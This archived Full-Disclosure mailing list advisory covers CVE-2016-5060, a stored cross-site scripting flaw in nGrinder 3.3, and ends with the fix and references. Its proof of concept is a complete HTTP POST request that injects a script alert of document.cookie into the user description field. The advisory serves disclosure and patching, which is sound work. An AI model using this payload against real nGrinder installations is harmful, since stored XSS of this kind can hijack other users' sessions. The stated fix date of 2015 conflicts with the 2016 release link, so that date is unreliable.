lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <575fbe053f3ea3.67384471@wp.pl>
Date: Tue, 14 Jun 2016 10:19:17 +0200
From: ljj <9085290852@...pl>
To: fulldisclosure <fulldisclosure@...lists.org>
Subject: [FD] CVE-2016-5060 Stored Cross-Site Scripting vulnerability in
	nGrinder

Title: CVE-2016-5060 Stored Cross-Site Scripting vulnerability in nGrinder 
Author: lukasz.juszczyk at ingservicespolska.pl
Date: 25.03.2016

Affected software :
=============
nGrinder v3.3
http://naver.github.io/ngrinder/

Description :
=============
nGrinder is a platform for stress tests that enables you to execute script creation, test execution, monitoring, and result report generator simultaneously. The open-source nGrinder offers easy ways to conduct stress tests by eliminating inconveniences and providing integrated environments.

Proof of Concept
=============
Vulnerable parameters: description, email, username

Request:
--------------------------------------------------------------------------------
POST /user/save HTTP/1.1
Host: 127.0.0.1:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/home
Cookie: ngrinder_lang=en; announcement_hide=true; JSESSIONID=1q0594qovhyj51ejxrqdkjmycp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 178

userId=test1&id=80&userName=test1&email=&description=Stored+XSS%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&mobilePhone=&followersStr=&password=p4$$w0rd&confirmPassword=
--------------------------------------------------------------------------------

Fix
=============
Upgrade to nGrinder 3.4 released on 24.05.2015.

References
=============
https://github.com/naver/ngrinder/releases/tag/ngrinder-3.4-20160525
https://github.com/naver/ngrinder/issues/103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5060







_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ